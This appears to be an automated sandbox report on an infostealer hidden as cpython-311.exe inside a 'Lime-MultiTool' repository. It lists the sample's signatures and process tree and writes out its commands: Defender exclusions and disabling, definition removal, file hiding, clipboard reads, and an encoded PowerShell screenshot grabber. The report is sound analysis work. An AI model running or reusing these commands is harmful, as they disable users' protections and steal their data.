Resubmissions
06-01-2025 02:41
250106-c6ynvstla1 10Analysis
-
max time kernel
92s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-01-2025 02:41
Behavioral task
behavioral1
Sample
Lime-MultiTool-main/src/main.py
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Lime-MultiTool-main/src/main.py
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Lime-MultiTool-main/src/utils/__pycache__/cpython-311.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
Lime-MultiTool-main/src/utils/__pycache__/cpython-311.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Lime-MultiTool-main/start.bat
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Lime-MultiTool-main/start.bat
Resource
win10v2004-20241007-en
General
-
Target
Lime-MultiTool-main/src/utils/__pycache__/cpython-311.exe
-
Size
7.4MB
-
MD5
1a2ff293768d10b8c99d3cd2950164b9
-
SHA1
e9123a3d2a53b5f8d008db9608037dd0571f3cae
-
SHA256
3c09a37412bf3981e5d678b6598c2cdad32fcd6761fc649a50693ba45746e242
-
SHA512
ff8a853675431bc36d88288546d7f467f239ae2e4e7ef019476ac4ca06f715e88f201753d7201dbfacb3b6dca51be764036372de8a8c0def29e00ae5e9469941
-
SSDEEP
98304:FWeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTfHfyk6LK4dSI23o7yc:FPYmOshoKMuIkhVastRL5Di3tO/ys42O
Malware Config
Signatures
-
pid Process 4412 powershell.exe 2724 powershell.exe 2428 powershell.exe 4808 powershell.exe 1032 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 656 powershell.exe 1080 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4660 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe 4360 cpython-311.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 discord.com 22 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 320 tasklist.exe 3996 tasklist.exe 956 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3028 cmd.exe -
resource yara_rule behavioral4/files/0x000a000000023b8d-21.dat upx behavioral4/memory/4360-25-0x00007FF8A8A50000-0x00007FF8A9039000-memory.dmp upx behavioral4/files/0x000a000000023b82-27.dat upx behavioral4/memory/4360-32-0x00007FF8BFA00000-0x00007FF8BFA0F000-memory.dmp upx behavioral4/files/0x000a000000023b8b-31.dat upx behavioral4/memory/4360-30-0x00007FF8BC820000-0x00007FF8BC843000-memory.dmp upx behavioral4/files/0x000a000000023b81-41.dat upx behavioral4/memory/4360-43-0x00007FF8BDCE0000-0x00007FF8BDCF9000-memory.dmp upx behavioral4/files/0x000a000000023b90-48.dat upx behavioral4/memory/4360-49-0x00007FF8B7460000-0x00007FF8B75D7000-memory.dmp upx behavioral4/files/0x000a000000023b89-56.dat upx behavioral4/memory/4360-55-0x00007FF8BB730000-0x00007FF8BB73D000-memory.dmp upx behavioral4/memory/4360-65-0x00007FF8B7390000-0x00007FF8B745D000-memory.dmp upx behavioral4/memory/4360-64-0x00007FF8A8A50000-0x00007FF8A9039000-memory.dmp upx behavioral4/files/0x000a000000023b8a-63.dat upx behavioral4/memory/4360-71-0x00007FF8BB680000-0x00007FF8BB694000-memory.dmp upx behavioral4/files/0x000a000000023b91-78.dat upx behavioral4/memory/4360-81-0x00007FF8A8410000-0x00007FF8A852C000-memory.dmp upx behavioral4/memory/4360-80-0x00007FF8BDCE0000-0x00007FF8BDCF9000-memory.dmp upx behavioral4/memory/4360-75-0x00007FF8B8230000-0x00007FF8B823D000-memory.dmp upx behavioral4/memory/4360-74-0x00007FF8BB6F0000-0x00007FF8BB71D000-memory.dmp upx behavioral4/memory/4360-117-0x00007FF8BB6C0000-0x00007FF8BB6E3000-memory.dmp upx behavioral4/files/0x000a000000023b86-73.dat upx behavioral4/files/0x000a000000023b84-70.dat upx behavioral4/memory/4360-68-0x00007FF8BC820000-0x00007FF8BC843000-memory.dmp upx behavioral4/memory/4360-67-0x00007FF8A8530000-0x00007FF8A8A50000-memory.dmp upx behavioral4/files/0x000a000000023b8c-61.dat upx behavioral4/memory/4360-268-0x00007FF8BB6A0000-0x00007FF8BB6B9000-memory.dmp upx behavioral4/memory/4360-189-0x00007FF8B7460000-0x00007FF8B75D7000-memory.dmp upx behavioral4/memory/4360-58-0x00007FF8B7D60000-0x00007FF8B7D93000-memory.dmp upx behavioral4/files/0x000a000000023b8f-54.dat upx behavioral4/memory/4360-52-0x00007FF8BB6A0000-0x00007FF8BB6B9000-memory.dmp upx behavioral4/files/0x000a000000023b87-51.dat upx behavioral4/memory/4360-47-0x00007FF8BB6C0000-0x00007FF8BB6E3000-memory.dmp upx behavioral4/memory/4360-269-0x00007FF8BB730000-0x00007FF8BB73D000-memory.dmp upx behavioral4/files/0x000a000000023b88-45.dat upx behavioral4/memory/4360-40-0x00007FF8BB6F0000-0x00007FF8BB71D000-memory.dmp upx behavioral4/files/0x000a000000023b85-39.dat upx behavioral4/memory/4360-290-0x00007FF8B7D60000-0x00007FF8B7D93000-memory.dmp upx behavioral4/memory/4360-311-0x00007FF8B7390000-0x00007FF8B745D000-memory.dmp upx behavioral4/memory/4360-313-0x00007FF8A8530000-0x00007FF8A8A50000-memory.dmp upx behavioral4/memory/4360-314-0x00007FF8BB680000-0x00007FF8BB694000-memory.dmp upx behavioral4/memory/4360-321-0x00007FF8B7460000-0x00007FF8B75D7000-memory.dmp upx behavioral4/memory/4360-316-0x00007FF8BC820000-0x00007FF8BC843000-memory.dmp upx behavioral4/memory/4360-315-0x00007FF8A8A50000-0x00007FF8A9039000-memory.dmp upx behavioral4/memory/4360-378-0x00007FF8BB6F0000-0x00007FF8BB71D000-memory.dmp upx behavioral4/memory/4360-390-0x00007FF8A8530000-0x00007FF8A8A50000-memory.dmp upx behavioral4/memory/4360-397-0x00007FF8B7390000-0x00007FF8B745D000-memory.dmp upx behavioral4/memory/4360-400-0x00007FF8A8410000-0x00007FF8A852C000-memory.dmp upx behavioral4/memory/4360-399-0x00007FF8B8230000-0x00007FF8B823D000-memory.dmp upx behavioral4/memory/4360-398-0x00007FF8BB680000-0x00007FF8BB694000-memory.dmp upx behavioral4/memory/4360-396-0x00007FF8B7D60000-0x00007FF8B7D93000-memory.dmp upx behavioral4/memory/4360-395-0x00007FF8BB730000-0x00007FF8BB73D000-memory.dmp upx behavioral4/memory/4360-394-0x00007FF8BB6A0000-0x00007FF8BB6B9000-memory.dmp upx behavioral4/memory/4360-393-0x00007FF8B7460000-0x00007FF8B75D7000-memory.dmp upx behavioral4/memory/4360-392-0x00007FF8BB6C0000-0x00007FF8BB6E3000-memory.dmp upx behavioral4/memory/4360-391-0x00007FF8BDCE0000-0x00007FF8BDCF9000-memory.dmp upx behavioral4/memory/4360-377-0x00007FF8BFA00000-0x00007FF8BFA0F000-memory.dmp upx behavioral4/memory/4360-376-0x00007FF8BC820000-0x00007FF8BC843000-memory.dmp upx behavioral4/memory/4360-375-0x00007FF8A8A50000-0x00007FF8A9039000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1812 cmd.exe 1772 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4892 cmd.exe 4480 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2572 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2468 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1772 PING.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 4412 powershell.exe 1032 powershell.exe 4808 powershell.exe 1032 powershell.exe 4412 powershell.exe 4808 powershell.exe 656 powershell.exe 656 powershell.exe 4044 powershell.exe 4044 powershell.exe 4044 powershell.exe 2724 powershell.exe 2724 powershell.exe 1100 powershell.exe 1100 powershell.exe 2428 powershell.exe 2428 powershell.exe 1040 powershell.exe 1040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4412 powershell.exe Token: SeDebugPrivilege 1032 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeDebugPrivilege 320 tasklist.exe Token: SeDebugPrivilege 3996 tasklist.exe Token: SeDebugPrivilege 956 tasklist.exe Token: SeDebugPrivilege 656 powershell.exe Token: SeIncreaseQuotaPrivilege 3124 WMIC.exe Token: SeSecurityPrivilege 3124 WMIC.exe Token: SeTakeOwnershipPrivilege 3124 WMIC.exe Token: SeLoadDriverPrivilege 3124 WMIC.exe Token: SeSystemProfilePrivilege 3124 WMIC.exe Token: SeSystemtimePrivilege 3124 WMIC.exe Token: SeProfSingleProcessPrivilege 3124 WMIC.exe Token: SeIncBasePriorityPrivilege 3124 WMIC.exe Token: SeCreatePagefilePrivilege 3124 WMIC.exe Token: SeBackupPrivilege 3124 WMIC.exe Token: SeRestorePrivilege 3124 WMIC.exe Token: SeShutdownPrivilege 3124 WMIC.exe Token: SeDebugPrivilege 3124 WMIC.exe Token: SeSystemEnvironmentPrivilege 3124 WMIC.exe Token: SeRemoteShutdownPrivilege 3124 WMIC.exe Token: SeUndockPrivilege 3124 WMIC.exe Token: SeManageVolumePrivilege 3124 WMIC.exe Token: 33 3124 WMIC.exe Token: 34 3124 WMIC.exe Token: 35 3124 WMIC.exe Token: 36 3124 WMIC.exe Token: SeIncreaseQuotaPrivilege 3124 WMIC.exe Token: SeSecurityPrivilege 3124 WMIC.exe Token: SeTakeOwnershipPrivilege 3124 WMIC.exe Token: SeLoadDriverPrivilege 3124 WMIC.exe Token: SeSystemProfilePrivilege 3124 WMIC.exe Token: SeSystemtimePrivilege 3124 WMIC.exe Token: SeProfSingleProcessPrivilege 3124 WMIC.exe Token: SeIncBasePriorityPrivilege 3124 WMIC.exe Token: SeCreatePagefilePrivilege 3124 WMIC.exe Token: SeBackupPrivilege 3124 WMIC.exe Token: SeRestorePrivilege 3124 WMIC.exe Token: SeShutdownPrivilege 3124 WMIC.exe Token: SeDebugPrivilege 3124 WMIC.exe Token: SeSystemEnvironmentPrivilege 3124 WMIC.exe Token: SeRemoteShutdownPrivilege 3124 WMIC.exe Token: SeUndockPrivilege 3124 WMIC.exe Token: SeManageVolumePrivilege 3124 WMIC.exe Token: 33 3124 WMIC.exe Token: 34 3124 WMIC.exe Token: 35 3124 WMIC.exe Token: 36 3124 WMIC.exe Token: SeDebugPrivilege 4044 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeIncreaseQuotaPrivilege 2548 WMIC.exe Token: SeSecurityPrivilege 2548 WMIC.exe Token: SeTakeOwnershipPrivilege 2548 WMIC.exe Token: SeLoadDriverPrivilege 2548 WMIC.exe Token: SeSystemProfilePrivilege 2548 WMIC.exe Token: SeSystemtimePrivilege 2548 WMIC.exe Token: SeProfSingleProcessPrivilege 2548 WMIC.exe Token: SeIncBasePriorityPrivilege 2548 WMIC.exe Token: SeCreatePagefilePrivilege 2548 WMIC.exe Token: SeBackupPrivilege 2548 WMIC.exe Token: SeRestorePrivilege 2548 WMIC.exe Token: SeShutdownPrivilege 2548 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3184 wrote to memory of 4360 3184 cpython-311.exe 83 PID 3184 wrote to memory of 4360 3184 cpython-311.exe 83 PID 4360 wrote to memory of 4872 4360 cpython-311.exe 84 PID 4360 wrote to memory of 4872 4360 cpython-311.exe 84 PID 4360 wrote to memory of 3964 4360 cpython-311.exe 85 PID 4360 wrote to memory of 3964 4360 cpython-311.exe 85 PID 4360 wrote to memory of 3028 4360 cpython-311.exe 86 PID 4360 wrote to memory of 3028 4360 cpython-311.exe 86 PID 4360 wrote to memory of 3960 4360 cpython-311.exe 90 PID 4360 wrote to memory of 3960 4360 cpython-311.exe 90 PID 3028 wrote to memory of 3876 3028 cmd.exe 92 PID 3028 wrote to memory of 3876 3028 cmd.exe 92 PID 4872 wrote to memory of 4808 4872 cmd.exe 162 PID 4872 wrote to memory of 4808 4872 cmd.exe 162 PID 3964 wrote to memory of 4412 3964 cmd.exe 167 PID 3964 wrote to memory of 4412 3964 cmd.exe 167 PID 3960 wrote to memory of 1032 3960 cmd.exe 95 PID 3960 wrote to memory of 1032 3960 cmd.exe 95 PID 4360 wrote to memory of 4860 4360 cpython-311.exe 96 PID 4360 wrote to memory of 4860 4360 cpython-311.exe 96 PID 4360 wrote to memory of 464 4360 cpython-311.exe 98 PID 4360 wrote to memory of 464 4360 cpython-311.exe 98 PID 4360 wrote to memory of 1500 4360 cpython-311.exe 100 PID 4360 wrote to memory of 1500 4360 cpython-311.exe 100 PID 4360 wrote to memory of 1080 4360 cpython-311.exe 101 PID 4360 wrote to memory of 1080 4360 cpython-311.exe 101 PID 4360 wrote to memory of 3540 4360 cpython-311.exe 103 PID 4360 wrote to memory of 3540 4360 cpython-311.exe 103 PID 4860 wrote to memory of 320 4860 cmd.exe 106 PID 4860 wrote to memory of 320 4860 cmd.exe 106 PID 464 wrote to memory of 3996 464 cmd.exe 107 PID 464 wrote to memory of 3996 464 cmd.exe 107 PID 1080 wrote to memory of 656 1080 cmd.exe 108 PID 1080 wrote to memory of 656 1080 cmd.exe 108 PID 3540 wrote to memory of 956 3540 cmd.exe 109 PID 3540 wrote to memory of 956 3540 cmd.exe 109 PID 1500 wrote to memory of 3124 1500 cmd.exe 110 PID 1500 wrote to memory of 3124 1500 cmd.exe 110 PID 4360 wrote to memory of 1100 4360 cpython-311.exe 111 PID 4360 wrote to memory of 1100 4360 cpython-311.exe 111 PID 4360 wrote to memory of 4892 4360 cpython-311.exe 112 PID 4360 wrote to memory of 4892 4360 cpython-311.exe 112 PID 1100 wrote to memory of 3040 1100 cmd.exe 116 PID 1100 wrote to memory of 3040 1100 cmd.exe 116 PID 4892 wrote to memory of 4480 4892 cmd.exe 117 PID 4892 wrote to memory of 4480 4892 cmd.exe 117 PID 4360 wrote to memory of 3292 4360 cpython-311.exe 118 PID 4360 wrote to memory of 3292 4360 cpython-311.exe 118 PID 4360 wrote to memory of 4672 4360 cpython-311.exe 120 PID 4360 wrote to memory of 4672 4360 cpython-311.exe 120 PID 4360 wrote to memory of 4420 4360 cpython-311.exe 122 PID 4360 wrote to memory of 4420 4360 cpython-311.exe 122 PID 4672 wrote to memory of 4044 4672 cmd.exe 125 PID 4672 wrote to memory of 4044 4672 cmd.exe 125 PID 3292 wrote to memory of 2468 3292 cmd.exe 124 PID 3292 wrote to memory of 2468 3292 cmd.exe 124 PID 4420 wrote to memory of 3280 4420 cmd.exe 126 PID 4420 wrote to memory of 3280 4420 cmd.exe 126 PID 4360 wrote to memory of 2612 4360 cpython-311.exe 127 PID 4360 wrote to memory of 2612 4360 cpython-311.exe 127 PID 2612 wrote to memory of 1464 2612 cmd.exe 156 PID 2612 wrote to memory of 1464 2612 cmd.exe 156 PID 4360 wrote to memory of 2940 4360 cpython-311.exe 130 PID 4360 wrote to memory of 2940 4360 cpython-311.exe 130 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3876 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"4⤵
- Views/modifies file attributes
PID:3876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
